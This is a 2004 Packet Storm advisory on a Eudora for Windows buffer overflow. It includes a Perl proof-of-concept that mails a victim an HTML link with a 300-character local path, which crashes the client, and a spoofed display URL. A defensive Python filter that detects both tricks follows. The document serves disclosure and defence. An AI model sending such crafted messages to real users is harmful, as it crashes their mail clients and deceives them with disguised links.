eudoraURL.txt

Date: 09 May 2004 00:00:00
Reported by: Paul Szabo
Type: packetstorm
Source: packetstormsecurity.com

Buffer overflow in Eudora for Windows allows arbitrary code execution, affecting versions 6.1, 6.0.3, 5.2.1.

Code
`There is a buffer overflow in Eudora for Windows, verified on versions  
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.  
I do not know if this issue affects Eudora for Macs.  
  
Demo:  
  
#!/usr/bin/perl --  
print "From: me\n";  
print "To: you\n";  
print "Subject: Eudora file URL buffer overflow demo\n";  
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";  
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";  
print "<x-html>\n";  
print "<a href=\"C:\\", "A"x300, "\">\n";  
print "Fake URL to http://anywhere/I/want</a>\n";  
print "</x-html>\n";  
print "Clicking above will crash Eudora.\n\n";  
print "The following plain-text converted by Eudora into a clickable URL\n";  
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";  
print "is for comparison: the user can hardly tell them apart.\n\n";  
  
Cheers,  
  
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/  
School of Mathematics and Statistics University of Sydney 2006 Australia  
`
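A mail-filter check for the two things the demo relies on, as an added example that is not part of the original advisory: an anchor whose `href` is an over-long local path, and link text that displays a different URL than the `href` it points to. The names `AnchorAudit` and `audit_body` are hypothetical, and the 260-character threshold (Windows `MAX_PATH`) is an assumption, since the advisory does not state the buffer size.

```python
import re
from html.parser import HTMLParser

MAX_HREF_LEN = 260  # assumption: Windows MAX_PATH; the advisory gives no buffer size
LOCAL_RE = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\|file:)", re.I)  # drive path, UNC, file: URL
URL_IN_TEXT_RE = re.compile(r"https?://[^\s<>\"]+", re.I)
# Constructed sample: the message body shape the advisory's demo script emits.
SAMPLE = '<x-html>\n<a href="C:\\' + "A" * 300 + '">\nFake URL to http://anywhere/I/want</a>\n</x-html>\n'


class AnchorAudit(HTMLParser):
    """Collect (href, visible text) for every <a> element in a message body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:  # only text inside an open <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def audit_body(body):
    """Return a list of (reason, href_prefix) findings for one message body."""
    parser = AnchorAudit()
    parser.feed(body)
    parser.close()
    findings = []
    for href, text in parser.anchors:
        # Local file reference longer than the threshold: the crash trigger.
        if LOCAL_RE.match(href) and len(href) > MAX_HREF_LEN:
            findings.append(("long-local-href", href[:16]))
        # Visible text shows a web URL, but the link goes somewhere else.
        shown = URL_IN_TEXT_RE.search(text)
        if shown and not href.lower().startswith(shown.group(0).lower()):
            findings.append(("text-href-mismatch", href[:16]))
    return findings
```

Only a 16-character prefix of each flagged `href` is returned, so the oversized value is not copied into logs or alerts.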

Vulners AI Score: 7.4 (High risk)